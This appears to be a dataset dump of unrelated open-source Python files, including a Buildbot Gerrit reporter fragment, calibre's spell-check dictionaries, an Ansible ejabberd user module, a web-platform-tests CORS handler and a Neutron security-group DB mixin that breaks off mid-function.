downloads = getProperty(build, "repo_downloads")
downloaded = getProperty(build, "repo_downloaded")
if downloads is not None and downloaded is not None:
downloaded = downloaded.split(" ")
if downloads and 2 * len(downloads) == len(downloaded):
for i, download in enumerate(downloads):
try:
project, change1 = download.split(" ")
except ValueError:
return # something is wrong, abort
change2 = downloaded[2 * i]
revision = downloaded[2 * i + 1]
if change1 == change2:
self.sendCodeReview(project, revision, result)
else:
return # something is wrong, abort
return
# Gerrit + Git
# used only to verify Gerrit source
if getProperty(build, "event.change.id") is not None:
project = getProperty(build, "event.change.project")
codebase = getProperty(build, "codebase")
revision = (getProperty(build, "event.patchSet.revision") or
getProperty(build, "got_revision") or
getProperty(build, "revision"))
if isinstance(revision, dict):
# in case the revision is a per-codebase dict, we just take the
# revision for the current codebase
if codebase is not None:
revision = revision[codebase]
else:
revision = None
if project is not None and revision is not None:
self.sendCodeReview(project, revision, result)
return
def sendCodeReview(self, project, revision, result):
gerrit_version = self.getCachedVersion()
if gerrit_version is None:
self.callWithVersion(
lambda: self.sendCodeReview(project, revision, result))
return
assert gerrit_version
command = self._gerritCmd("review", "--project {}".format(project))
if gerrit_version >= parse_version("2.13"):
command.append('--tag autogenerated:buildbot')
if self._gerrit_notify is not None:
command.append('--notify {}'.format(str(self._gerrit_notify)))
message = result.get('message', None)
if message:
command.append("--message '{}'".format(message.replace("'", "\"")))
labels = result.get('labels', None)
if labels:
if gerrit_version < parse_version("2.6"):
add_label = _old_add_label
else:
add_label = _new_add_label
for label, value in labels.items():
command.extend(add_label(label, value))
command.append(revision)
command = [str(s) for s in command]
self.spawnProcess(self.LocalPP(self), command[0], command, env=None)
def spawnProcess(self, *arg, **kw):
reactor.spawnProcess(*arg, **kw)
|
alingse/httpdec
|
refs/heads/master
|
httpdec/main.py
|
1
|
# coding=utf-8
from .decode import decode
import click
from StringIO import StringIO
import pyperclip
import sys
stdin = sys.stdin
stdout = sys.stdout
typed = dict(
h='header',
c='cookie')
types = typed.keys() + typed.values()
def fake_clip():
content = pyperclip.paste()
fin = StringIO(content)
fout = StringIO()
def close():
value = fout.getvalue()
pyperclip.copy(value)
fout.close = close
return fin, fout
def fake_raw(content):
fin = StringIO(content)
return fin
@click.command()
@click.option('-d', '--type', type=click.Choice(types), help='decode type')
@click.option('-p', '--clip', is_flag=True, help='read/write to clipboard')
@click.option('--raw', type=unicode, help='raw input string', default=None)
@click.argument('input', type=click.File('r'), default=stdin)
@click.argument('output', type=click.File('w'), default=stdout)
def httpdec(output, input, raw, clip, type):
"""
httpdec [OPTIONS] [INPUT] [OUTPUT]
INPUT: the source file, default is stdin
OUTPUT: the output file, default is stdout
"""
if clip:
input, output = fake_clip()
if raw is not None:
input = fake_raw(raw)
type = typed[type[0]]
decode(input, output, type)
input.close()
output.close()
|
rapilabs/django
|
refs/heads/master
|
django/contrib/postgres/aggregates/__init__.py
|
625
|
from .general import * # NOQA
from .statistics import * # NOQA
|
mohammed-alfatih/servo
|
refs/heads/master
|
tests/wpt/web-platform-tests/XMLHttpRequest/resources/auth2/corsenabled.py
|
367
|
import imp
import os
def main(request, response):
response.headers.set('Access-Control-Allow-Origin', request.headers.get("origin"))
response.headers.set('Access-Control-Allow-Credentials', 'true')
response.headers.set('Access-Control-Allow-Methods', 'GET')
response.headers.set('Access-Control-Allow-Headers', 'authorization, x-user, x-pass')
response.headers.set('Access-Control-Expose-Headers', 'x-challenge, xhr-user, ses-user')
auth = imp.load_source("", os.path.join(os.path.abspath(os.curdir),
"XMLHttpRequest",
"resources",
"authentication.py"))
if request.method == "OPTIONS":
return ""
else:
return auth.main(request, response)
|
ns950/calibre
|
refs/heads/master
|
src/calibre/spell/dictionary.py
|
3
|
#!/usr/bin/env python2
# vim:fileencoding=utf-8
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2014, Kovid Goyal <kovid at kovidgoyal.net>'
import os, glob, shutil, re, sys
from collections import namedtuple, defaultdict
from operator import attrgetter
from itertools import chain
from functools import partial
from calibre import prints
from calibre.constants import plugins, config_dir
from calibre.spell import parse_lang_code
from calibre.utils.config import JSONConfig
from calibre.utils.icu import capitalize
from calibre.utils.localization import get_lang, get_system_locale
Dictionary = namedtuple('Dictionary', 'primary_locale locales dicpath affpath builtin name id')
LoadedDictionary = namedtuple('Dictionary', 'primary_locale locales obj builtin name id')
hunspell = plugins['hunspell'][0]
if hunspell is None:
raise RuntimeError('Failed to load hunspell: %s' % plugins['hunspell'][1])
dprefs = JSONConfig('dictionaries/prefs.json')
dprefs.defaults['preferred_dictionaries'] = {}
dprefs.defaults['preferred_locales'] = {}
dprefs.defaults['user_dictionaries'] = [{'name':_('Default'), 'is_active':True, 'words':[]}]
not_present = object()
class UserDictionary(object):
__slots__ = ('name', 'is_active', 'words')
def __init__(self, **kwargs):
self.name = kwargs['name']
self.is_active = kwargs['is_active']
self.words = {(w, langcode) for w, langcode in kwargs['words']}
def serialize(self):
return {'name':self.name, 'is_active': self.is_active, 'words':[
(w, l) for w, l in self.words]}
_builtins = _custom = None
def builtin_dictionaries():
global _builtins
if _builtins is None:
dics = []
for lc in glob.glob(os.path.join(P('dictionaries', allow_user_override=False), '*/locales')):
locales = filter(None, open(lc, 'rb').read().decode('utf-8').splitlines())
locale = locales[0]
base = os.path.dirname(lc)
dics.append(Dictionary(
parse_lang_code(locale), frozenset(map(parse_lang_code, locales)), os.path.join(base, '%s.dic' % locale),
os.path.join(base, '%s.aff' % locale), True, None, None))
_builtins = frozenset(dics)
return _builtins
def custom_dictionaries(reread=False):
global _custom
if _custom is None or reread:
dics = []
for lc in glob.glob(os.path.join(config_dir, 'dictionaries', '*/locales')):
locales = filter(None, open(lc, 'rb').read().decode('utf-8').splitlines())
try:
name, locale, locales = locales[0], locales[1], locales[1:]
except IndexError:
continue
base = os.path.dirname(lc)
ploc = parse_lang_code(locale)
if ploc.countrycode is None:
continue
dics.append(Dictionary(
ploc, frozenset(filter(lambda x:x.countrycode is not None, map(parse_lang_code, locales))), os.path.join(base, '%s.dic' % locale),
os.path.join(base, '%s.aff' % locale), False, name, os.path.basename(base)))
_custom = frozenset(dics)
return _custom
default_en_locale = 'en-US'
try:
ul = parse_lang_code(get_system_locale() or 'en-US')
except ValueError:
ul = None
if ul is not None and ul.langcode == 'eng' and ul.countrycode in 'GB BS BZ GH IE IN JM NZ TT'.split():
default_en_locale = 'en-' + ul.countrycode
default_preferred_locales = {'eng':default_en_locale, 'deu':'de-DE', 'spa':'es-ES', 'fra':'fr-FR'}
def best_locale_for_language(langcode):
best_locale = dprefs['preferred_locales'].get(langcode, default_preferred_locales.get(langcode, None))
if best_locale is not None:
return parse_lang_code(best_locale)
def preferred_dictionary(locale):
return {parse_lang_code(k):v for k, v in dprefs['preferred_dictionaries'].iteritems()}.get(locale, None)
def remove_dictionary(dictionary):
if dictionary.builtin:
raise ValueError('Cannot remove builtin dictionaries')
base = os.path.dirname(dictionary.dicpath)
shutil.rmtree(base)
dprefs['preferred_dictionaries'] = {k:v for k, v in dprefs['preferred_dictionaries'].iteritems() if v != dictionary.id}
def rename_dictionary(dictionary, name):
lf = os.path.join(os.path.dirname(dictionary.dicpath), 'locales')
with open(lf, 'r+b') as f:
lines = f.read().splitlines()
lines[:1] = [name.encode('utf-8')]
f.seek(0), f.truncate(), f.write(b'\n'.join(lines))
custom_dictionaries(reread=True)
def get_dictionary(locale, exact_match=False):
preferred = preferred_dictionary(locale)
# First find all dictionaries that match locale exactly
exact_matches = {}
for collection in (custom_dictionaries(), builtin_dictionaries()):
for d in collection:
if d.primary_locale == locale:
exact_matches[d.id] = d
for d in collection:
for q in d.locales:
if q == locale and d.id not in exact_matches:
exact_matches[d.id] = d
# If the user has specified a preferred dictionary for this locale, use it,
# otherwise, if a builtin dictionary exists, use that
if preferred in exact_matches:
return exact_matches[preferred]
# Return one of the exactly matching dictionaries, preferring user
# installed to builtin ones
for k in sorted(exact_matches, key=lambda x: (1, None) if x is None else (0, x)):
return exact_matches[k]
if exact_match:
return
# No dictionary matched the locale exactly, we will now fallback to
# matching only on language. First see if a dictionary matching the
# preferred locale for the language exists.
best_locale = best_locale_for_language(locale.langcode)
if best_locale is not None:
ans = get_dictionary(best_locale, exact_match=True)
if ans is not None:
return ans
# Now just return any dictionary that matches the language, preferring user
# installed ones to builtin ones
for collection in (custom_dictionaries(), builtin_dictionaries()):
for d in sorted(collection, key=attrgetter('name')):
if d.primary_locale.langcode == locale.langcode:
return d
def load_dictionary(dictionary):
from calibre.spell.import_from import convert_to_utf8
with open(dictionary.dicpath, 'rb') as dic, open(dictionary.affpath, 'rb') as aff:
dic_data, aff_data = dic.read(), aff.read()
dic_data, aff_data = convert_to_utf8(dic_data, aff_data)
obj = hunspell.Dictionary(dic_data, aff_data)
return LoadedDictionary(dictionary.primary_locale, dictionary.locales, obj, dictionary.builtin, dictionary.name, dictionary.id)
class Dictionaries(object):
def __init__(self):
self.remove_hyphenation = re.compile('[\u2010-]+')
self.negative_pat = re.compile('-[.\d+]')
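# negative_pat lets tokens that look like negative numbers (e.g. '-3.5') be
# treated as recognized words in recognized() below.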
self.fix_punctuation_pat = re.compile(r'''[:.]''')
self.dictionaries = {}
self.word_cache = {}
self.ignored_words = set()
self.added_user_words = {}
try:
self.default_locale = parse_lang_code(get_lang())
except ValueError:
self.default_locale = parse_lang_code('en-US')
self.ui_locale = self.default_locale
def initialize(self, force=False):
if force or not hasattr(self, 'active_user_dictionaries'):
self.read_user_dictionaries()
def clear_caches(self):
self.dictionaries.clear(), self.word_cache.clear()
def clear_ignored(self):
self.ignored_words.clear()
def dictionary_for_locale(self, locale):
ans = self.dictionaries.get(locale, not_present)
if ans is not_present:
ans = get_dictionary(locale)
if ans is not None:
ans = load_dictionary(ans)
for ud in self.active_user_dictionaries:
for word, langcode in ud.words:
if langcode == locale.langcode:
try:
ans.obj.add(word)
except Exception:
# not critical since all it means is that the word won't show up in suggestions
prints('Failed to add the word %r to the dictionary for %s' % (word, locale), file=sys.stderr)
self.dictionaries[locale] = ans
return ans
def ignore_word(self, word, locale):
self.ignored_words.add((word, locale.langcode))
self.word_cache[(word, locale)] = True
def unignore_word(self, word, locale):
self.ignored_words.discard((word, locale.langcode))
self.word_cache.pop((word, locale), None)
def is_word_ignored(self, word, locale):
return (word, locale.langcode) in self.ignored_words
@property
def all_user_dictionaries(self):
return chain(self.active_user_dictionaries, self.inactive_user_dictionaries)
def user_dictionary(self, name):
for ud in self.all_user_dictionaries:
if ud.name == name:
return ud
def read_user_dictionaries(self):
self.active_user_dictionaries = []
self.inactive_user_dictionaries = []
for d in dprefs['user_dictionaries'] or dprefs.defaults['user_dictionaries']:
d = UserDictionary(**d)
(self.active_user_dictionaries if d.is_active else self.inactive_user_dictionaries).append(d)
def mark_user_dictionary_as_active(self, name, is_active=True):
d = self.user_dictionary(name)
if d is not None:
d.is_active = is_active
self.save_user_dictionaries()
return True
return False
def save_user_dictionaries(self):
dprefs['user_dictionaries'] = [d.serialize() for d in self.all_user_dictionaries]
def add_user_words(self, words, langcode):
for d in self.dictionaries.itervalues():
if d and getattr(d.primary_locale, 'langcode', None) == langcode:
for word in words:
d.obj.add(word)
def remove_user_words(self, words, langcode):
for d in self.dictionaries.itervalues():
if d and d.primary_locale.langcode == langcode:
for word in words:
d.obj.remove(word)
def add_to_user_dictionary(self, name, word, locale):
ud = self.user_dictionary(name)
if ud is None:
raise ValueError('Cannot add to the dictionary named: %s as no such dictionary exists' % name)
wl = len(ud.words)
if isinstance(word, (set, frozenset)):
ud.words |= word
self.add_user_words(word, locale.langcode)
else:
ud.words.add((word, locale.langcode))
self.add_user_words((word,), locale.langcode)
if len(ud.words) > wl:
self.save_user_dictionaries()
try:
self.word_cache.pop((word, locale), None)
except TypeError:
pass # word is a set, ignore
return True
return False
def remove_from_user_dictionaries(self, word, locale):
key = (word, locale.langcode)
changed = False
for ud in self.active_user_dictionaries:
if key in ud.words:
changed = True
ud.words.discard(key)
if changed:
self.word_cache.pop((word, locale), None)
self.save_user_dictionaries()
self.remove_user_words((word,), locale.langcode)
return changed
def remove_from_user_dictionary(self, name, words):
changed = False
removals = defaultdict(set)
keys = [(w, l.langcode) for w, l in words]
for d in self.all_user_dictionaries:
if d.name == name:
for key in keys:
if key in d.words:
d.words.discard(key)
removals[key[1]].add(key[0])
changed = True
if changed:
for key in words:
self.word_cache.pop(key, None)
for langcode, words in removals.iteritems():
self.remove_user_words(words, langcode)
self.save_user_dictionaries()
return changed
def word_in_user_dictionary(self, word, locale):
key = (word, locale.langcode)
for ud in self.active_user_dictionaries:
if key in ud.words:
return ud.name
def create_user_dictionary(self, name):
if name in {d.name for d in self.all_user_dictionaries}:
raise ValueError('A dictionary named %s already exists' % name)
d = UserDictionary(name=name, is_active=True, words=())
self.active_user_dictionaries.append(d)
self.save_user_dictionaries()
def remove_user_dictionary(self, name):
changed = False
for x in (self.active_user_dictionaries, self.inactive_user_dictionaries):
for d in tuple(x):
if d.name == name:
x.remove(d)
changed = True
if changed:
self.save_user_dictionaries()
self.clear_caches()
return changed
def rename_user_dictionary(self, name, new_name):
changed = False
for d in self.all_user_dictionaries:
if d.name == name:
d.name = new_name
changed = True
if changed:
self.save_user_dictionaries()
return changed
def recognized(self, word, locale=None):
locale = locale or self.default_locale
key = (word, locale)
ans = self.word_cache.get(key, None)
if ans is None:
lkey = (word, locale.langcode)
ans = False
if lkey in self.ignored_words:
ans = True
else:
for ud in self.active_user_dictionaries:
if lkey in ud.words:
ans = True
break
else:
d = self.dictionary_for_locale(locale)
if d is not None:
try:
ans = d.obj.recognized(word)
except ValueError:
pass
else:
ans = True
if ans is False and self.negative_pat.match(word) is not None:
ans = True
self.word_cache[key] = ans
return ans
def suggestions(self, word, locale=None):
locale = locale or self.default_locale
d = self.dictionary_for_locale(locale)
ans = ()
def add_suggestion(w, ans):
return (w,) + tuple(x for x in ans if x != w)
if d is not None:
try:
ans = d.obj.suggest(unicode(word))
except ValueError:
pass
else:
dehyphenated_word = self.remove_hyphenation.sub('', word)
if len(dehyphenated_word) != len(word) and self.recognized(dehyphenated_word, locale):
# Ensure the de-hyphenated word is present and is the first suggestion
ans = add_suggestion(dehyphenated_word, ans)
else:
m = self.fix_punctuation_pat.search(word)
if m is not None:
w1, w2 = word[:m.start()], word[m.end():]
if self.recognized(w1) and self.recognized(w2):
fw = w1 + m.group() + ' ' + w2
ans = add_suggestion(fw, ans)
if capitalize(w2) != w2:
fw = w1 + m.group() + ' ' + capitalize(w2)
ans = add_suggestion(fw, ans)
return ans
def test_dictionaries():
dictionaries = Dictionaries()
dictionaries.initialize()
eng = parse_lang_code('en')
rec = partial(dictionaries.recognized, locale=eng)
sg = partial(dictionaries.suggestions, locale=eng)
if not rec('recognized'):
raise ValueError('recognized not recognized')
if 'adequately' not in sg('ade-quately'):
raise ValueError('adequately not in %s' % sg('ade-quately'))
if 'magic. Wand' not in sg('magic.wand'):
raise ValueError('magic. Wand not in: %s' % sg('magic.wand'))
d = load_dictionary(get_dictionary(parse_lang_code('es'))).obj
assert d.recognized('Achí')
if __name__ == '__main__':
test_dictionaries()
|
BaladiDogGames/baladidoggames.github.io
|
refs/heads/master
|
mingw/bin/lib/lib2to3/fixes/fix_map.py
|
327
|
# Copyright 2007 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Fixer that changes map(F, ...) into list(map(F, ...)) unless there
exists a 'from future_builtins import map' statement in the top-level
namespace.
As a special case, map(None, X) is changed into list(X). (This is
necessary because the semantics are changed in this case -- the new
map(None, X) is equivalent to [(x,) for x in X].)
We avoid the transformation (except for the special case mentioned
above) if the map() call is directly contained in iter(<>), list(<>),
tuple(<>), sorted(<>), ...join(<>), or for V in <>:.
NOTE: This is still not correct if the original code was depending on
map(F, X, Y, ...) to go on until the longest argument is exhausted,
substituting None for missing values -- like zip(), it now stops as
soon as the shortest argument is exhausted.
"""
# Local imports
from ..pgen2 import token
from .. import fixer_base
from ..fixer_util import Name, Call, ListComp, in_special_context
from ..pygram import python_symbols as syms
class FixMap(fixer_base.ConditionalFix):
BM_compatible = True
PATTERN = """
map_none=power<
'map'
trailer< '(' arglist< 'None' ',' arg=any [','] > ')' >
>
|
map_lambda=power<
'map'
trailer<
'('
arglist<
lambdef< 'lambda'
(fp=NAME | vfpdef< '(' fp=NAME ')'> ) ':' xp=any
>
','
it=any
>
')'
>
>
|
power<
'map' trailer< '(' [arglist=any] ')' >
>
"""
skip_on = 'future_builtins.map'
def transform(self, node, results):
if self.should_skip(node):
return
if node.parent.type == syms.simple_stmt:
self.warning(node, "You should use a for loop here")
new = node.clone()
new.prefix = u""
new = Call(Name(u"list"), [new])
elif "map_lambda" in results:
new = ListComp(results["xp"].clone(),
results["fp"].clone(),
results["it"].clone())
else:
if "map_none" in results:
new = results["arg"].clone()
else:
if "arglist" in results:
args = results["arglist"]
if args.type == syms.arglist and \
args.children[0].type == token.NAME and \
args.children[0].value == "None":
self.warning(node, "cannot convert map(None, ...) "
"with multiple arguments because map() "
"now truncates to the shortest sequence")
return
if in_special_context(node):
return None
new = node.clone()
new.prefix = u""
new = Call(Name(u"list"), [new])
new.prefix = node.prefix
return new
|
txemi/ansible
|
refs/heads/devel
|
lib/ansible/modules/web_infrastructure/ejabberd_user.py
|
48
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013, Peter Sprygada <sprygada@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ejabberd_user
version_added: "1.5"
author: "Peter Sprygada (@privateip)"
short_description: Manages users for ejabberd servers
requirements:
- ejabberd with mod_admin_extra
description:
- This module provides user management for ejabberd servers
options:
username:
description:
- the name of the user to manage
required: true
host:
description:
- the ejabberd host associated with this username
required: true
password:
description:
- the password to assign to the username
required: false
logging:
description:
- enables or disables the local syslog facility for this module
required: false
default: false
choices: [ 'true', 'false', 'yes', 'no' ]
state:
description:
- describe the desired state of the user to be managed
required: false
default: 'present'
choices: [ 'present', 'absent' ]
notes:
- Password parameter is required for state == present only
- Passwords must be stored in clear text for this release
- The ejabberd configuration file must include mod_admin_extra as a module.
'''
EXAMPLES = '''
# Example playbook entries using the ejabberd_user module to manage users state.
- name: create a user if it does not exists
ejabberd_user:
username: test
host: server
password: password
- name: delete a user if it exists
ejabberd_user:
username: test
host: server
state: absent
'''
import syslog
from ansible.module_utils.pycompat24 import get_exception
from ansible.module_utils.basic import *
class EjabberdUserException(Exception):
""" Base exception for EjabberdUser class object """
pass
class EjabberdUser(object):
""" This object represents a user resource for an ejabberd server. The
object manages user creation and deletion using ejabberdctl. The following
commands are currently supported:
* ejabberdctl register
* ejabberdctl unregister
"""
def __init__(self, module):
self.module = module
self.logging = module.params.get('logging')
self.state = module.params.get('state')
self.host = module.params.get('host')
self.user = module.params.get('username')
self.pwd = module.params.get('password')
@property
def changed(self):
""" This method will check the current user and see if the password has
changed. It will return a non-zero value if the stored password does not
match the supplied credentials and zero if it does
"""
try:
options = [self.user, self.host, self.pwd]
(rc, out, err) = self.run_command('check_password', options)
except EjabberdUserException:
e = get_exception()
(rc, out, err) = (1, None, "required attribute(s) missing")
return rc
@property
def exists(self):
""" This method will check to see if the supplied username exists for
host specified. If the user exists True is returned, otherwise False
is returned
"""
try:
options = [self.user, self.host]
(rc, out, err) = self.run_command('check_account', options)
except EjabberdUserException:
e = get_exception()
(rc, out, err) = (1, None, "required attribute(s) missing")
return not bool(int(rc))
def log(self, entry):
""" This method will log information to the local syslog facility """
if self.logging:
syslog.openlog('ansible-%s' % self.module._name)
syslog.syslog(syslog.LOG_NOTICE, entry)
def run_command(self, cmd, options):
""" This method will run the any command specified and return the
returns using the Ansible common module
"""
if not all(options):
raise EjabberdUserException
cmd = 'ejabberdctl %s ' % cmd
cmd += " ".join(options)
self.log('command: %s' % cmd)
return self.module.run_command(cmd.split())
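# e.g. run_command('check_password', [user, host, password]) ends up executing
# roughly: ejabberdctl check_password <user> <host> <password>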
def update(self):
""" The update method will update the credentials for the user provided
"""
try:
options = [self.user, self.host, self.pwd]
(rc, out, err) = self.run_command('change_password', options)
except EjabberdUserException:
e = get_exception()
(rc, out, err) = (1, None, "required attribute(s) missing")
return (rc, out, err)
def create(self):
""" The create method will create a new user on the host with the
password provided
"""
try:
options = [self.user, self.host, self.pwd]
(rc, out, err) = self.run_command('register', options)
except EjabberdUserException:
e = get_exception()
(rc, out, err) = (1, None, "required attribute(s) missing")
return (rc, out, err)
def delete(self):
""" The delete method will delete the user from the host
"""
try:
options = [self.user, self.host]
(rc, out, err) = self.run_command('unregister', options)
except EjabberdUserException:
e = get_exception()
(rc, out, err) = (1, None, "required attribute(s) missing")
return (rc, out, err)
def main():
module = AnsibleModule(
argument_spec = dict(
host=dict(default=None, type='str'),
username=dict(default=None, type='str'),
password=dict(default=None, type='str', no_log=True),
state=dict(default='present', choices=['present', 'absent']),
logging=dict(default=False, type='bool')
),
supports_check_mode = True
)
obj = EjabberdUser(module)
rc = None
result = dict()
if obj.state == 'absent':
if obj.exists:
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = obj.delete()
if rc != 0:
module.fail_json(msg=err, rc=rc)
elif obj.state == 'present':
if not obj.exists:
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = obj.create()
elif obj.changed:
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = obj.update()
if rc is not None and rc != 0:
module.fail_json(msg=err, rc=rc)
if rc is None:
result['changed'] = False
else:
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
|
gispro/OceanViewer2
|
refs/heads/master
|
app/static/externals/proj4js/tools/mkpjcat.py
|
250
|
#!/usr/bin/env python
import sys
sys.path.append(".")
import pjjs
resourcesDirectory = "catalogues"
targetDirectory = "../lib/defs"
if len(sys.argv) > 1:
resourcesDirectory = sys.argv[1]
if len(sys.argv) > 2:
targetDirectory = sys.argv[2]
print "Generating Proj4js catalogues."
pjjs.pjcat2js_clean(resourcesDirectory,targetDirectory)
pjjs.pjcat2js_run(resourcesDirectory,targetDirectory)
print "Done."
|
samrose3/eventhunt
|
refs/heads/master
|
tests/python/base/test_views.py
|
1
|
from django.core.urlresolvers import reverse
from django.test import override_settings
from rest_framework import status
from rest_framework.test import APITestCase
from tests.python.accounts.test_models import UserFactory
@override_settings(CELERY_EAGER_PROPAGATES_EXCEPTIONS=True, CELERY_ALWAYS_EAGER=True, BROKER_BACKEND='memory')
class BaseTests(APITestCase):
def setUp(self):
pass
def test_get_main_page(self):
response = self.client.get(reverse('index'))
self.assertEqual(response.status_code, status.HTTP_200_OK)
|
leeseuljeong/leeseulstack_neutron
|
refs/heads/master
|
neutron/db/securitygroups_db.py
|
8
|
# Copyright 2012 VMware, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
import sqlalchemy as sa
from sqlalchemy import orm
from sqlalchemy.orm import exc
from sqlalchemy.orm import scoped_session
from neutron.api.v2 import attributes
from neutron.common import constants
from neutron.db import db_base_plugin_v2
from neutron.db import model_base
from neutron.db import models_v2
from neutron.extensions import securitygroup as ext_sg
from neutron.openstack.common import uuidutils
IP_PROTOCOL_MAP = {constants.PROTO_NAME_TCP: constants.PROTO_NUM_TCP,
constants.PROTO_NAME_UDP: constants.PROTO_NUM_UDP,
constants.PROTO_NAME_ICMP: constants.PROTO_NUM_ICMP,
constants.PROTO_NAME_ICMP_V6: constants.PROTO_NUM_ICMP_V6}
class SecurityGroup(model_base.BASEV2, models_v2.HasId, models_v2.HasTenant):
"""Represents a v2 neutron security group."""
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(255))
class SecurityGroupPortBinding(model_base.BASEV2):
"""Represents binding between neutron ports and security profiles."""
port_id = sa.Column(sa.String(36),
sa.ForeignKey("ports.id",
ondelete='CASCADE'),
primary_key=True)
security_group_id = sa.Column(sa.String(36),
sa.ForeignKey("securitygroups.id"),
primary_key=True)
# Add a relationship to the Port model in order to instruct SQLAlchemy to
# eagerly load security group bindings
ports = orm.relationship(
models_v2.Port,
backref=orm.backref("security_groups",
lazy='joined', cascade='delete'))
class SecurityGroupRule(model_base.BASEV2, models_v2.HasId,
models_v2.HasTenant):
"""Represents a v2 neutron security group rule."""
security_group_id = sa.Column(sa.String(36),
sa.ForeignKey("securitygroups.id",
ondelete="CASCADE"),
nullable=False)
remote_group_id = sa.Column(sa.String(36),
sa.ForeignKey("securitygroups.id",
ondelete="CASCADE"),
nullable=True)
direction = sa.Column(sa.Enum('ingress', 'egress',
name='securitygrouprules_direction'))
ethertype = sa.Column(sa.String(40))
protocol = sa.Column(sa.String(40))
port_range_min = sa.Column(sa.Integer)
port_range_max = sa.Column(sa.Integer)
remote_ip_prefix = sa.Column(sa.String(255))
security_group = orm.relationship(
SecurityGroup,
backref=orm.backref('rules', cascade='all,delete'),
primaryjoin="SecurityGroup.id==SecurityGroupRule.security_group_id")
source_group = orm.relationship(
SecurityGroup,
backref=orm.backref('source_rules', cascade='all,delete'),
primaryjoin="SecurityGroup.id==SecurityGroupRule.remote_group_id")
class SecurityGroupDbMixin(ext_sg.SecurityGroupPluginBase):
"""Mixin class to add security group to db_base_plugin_v2."""
__native_bulk_support = True
def create_security_group_bulk(self, context, security_group_rule):
return self._create_bulk('security_group', context,
security_group_rule)
def create_security_group(self, context, security_group, default_sg=False):
"""Create security group.
If default_sg is True, the security group being created is the default
group for the given tenant, so the check that a default group already
exists for that tenant is skipped.
"""
s = security_group['security_group']
tenant_id = self._get_tenant_id_for_create(context, s)
if not default_sg:
self._ensure_default_security_group(context, tenant_id)
with context.session.begin(subtransactions=True):
security_group_db = SecurityGroup(id=s.get('id') or (
uuidutils.generate_uuid()),
description=s['description'],
tenant_id=tenant_id,
name=s['name'])
context.session.add(security_group_db)
for ethertype in ext_sg.sg_supported_ethertypes:
if s.get('name') == 'default':
# Allow intercommunication
ingress_rule = SecurityGroupRule(
id=uuidutils.generate_uuid(), tenant_id=tenant_id,
security_group=security_group_db,
direction='ingress',
ethertype=ethertype,
source_group=security_group_db)
context.session.add(ingress_rule)
egress_rule = SecurityGroupRule(
id=uuidutils.generate_uuid(), tenant_id=tenant_id,
security_group=security_group_db,
direction='egress',
ethertype=ethertype)
context.session.add(egress_rule)
return self._make_security_group_dict(security_group_db)
def get_security_groups(self, context, filters=None, fields=None,
sorts=None, limit=None,
marker=None, page_reverse=False, default_sg=False):
# If default_sg is True do not call _ensure_default_security_group()
# so this can be done recursively. Context.tenant_id is checked
# because all the unit tests do not explicitly set the context on
# GETS. TODO(arosen) context handling can probably be improved here.
if not default_sg and context.tenant_id:
tenant_id = filters.get('tenant_id')
if tenant_id:
tenant_id = tenant_id[0]
else:
tenant_id = context.tenant_id
self._ensure_default_security_group(context, tenant_id)
marker_obj = self._get_marker_obj(context, 'security_group', limit,
marker)
return self._get_collection(context,
SecurityGroup,
self._make_security_group_dict,
filters=filters, fields=fields,
sorts=sorts,
limit=limit, marker_obj=marker_obj,
page_reverse=page_reverse)
def get_security_groups_count(self, context, filters=None):
return self._get_collection_count(context, SecurityGroup,
filters=filters)
def get_security_group(self, context, id, fields=None, tenant_id=None):
"""Tenant id is given to handle the case when creating a security
group rule on behalf of another user.
"""
if tenant_id:
tmp_context_tenant_id = context.tenant_id
context.tenant_id = tenant_id
try:
with context.session.begin(subtransactions=True):
ret = self._make_security_group_dict(self._get_security_group(
context, id), fields)
ret['security_group_rules'] = self.get_security_group_rules(
context, {'security_group_id': [id]})
finally:
if tenant_id:
context.tenant_id = tmp_context_tenant_id
return ret
def _get_security_group(self, context, id):
try:
query = self._model_query(context, SecurityGroup)
sg = query.filter(SecurityGroup.id == id).one()
except exc.NoResultFound:
raise ext_sg.SecurityGroupNotFound(id=id)
return sg
def delete_security_group(self, context, id):
filters = {'security_group_id': [id]}
ports = self._get_port_security_group_bindings(context, filters)
if ports:
raise ext_sg.SecurityGroupInUse(id=id)
# confirm security group exists
sg = self._get_security_group(context, id)
if sg['name'] == 'default' and not context.is_admin:
raise ext_sg.SecurityGroupCannotRemoveDefault()
with context.session.begin(subtransactions=True):
context.session.delete(sg)
def update_security_group(self, context, id, security_group):
s = security_group['security_group']
with context.session.begin(subtransactions=True):
sg = self._get_security_group(context, id)
if sg['name'] == 'default' and 'name' in s:
raise ext_sg.SecurityGroupCannotUpdateDefault()
sg.update(s)
return self._make_security_group_dict(sg)
def _make_security_group_dict(self, security_group, fields=None):
res = {'id': security_group['id'],
'name': security_group['name'],
'tenant_id': security_group['tenant_id'],
'description': security_group['description']}
res['security_group_rules'] = [self._make_security_group_rule_dict(r)
for r in security_group.rules]
return self._fields(res, fields)
def _make_security_group_binding_dict(self, security_group, fields=None):
res = {'port_id': security_group['port_id'],
'security_group_id': security_group['security_group_id']}
return self._fields(res, fields)
def _create_port_security_group_binding(self, context, port_id,
security_group_id):
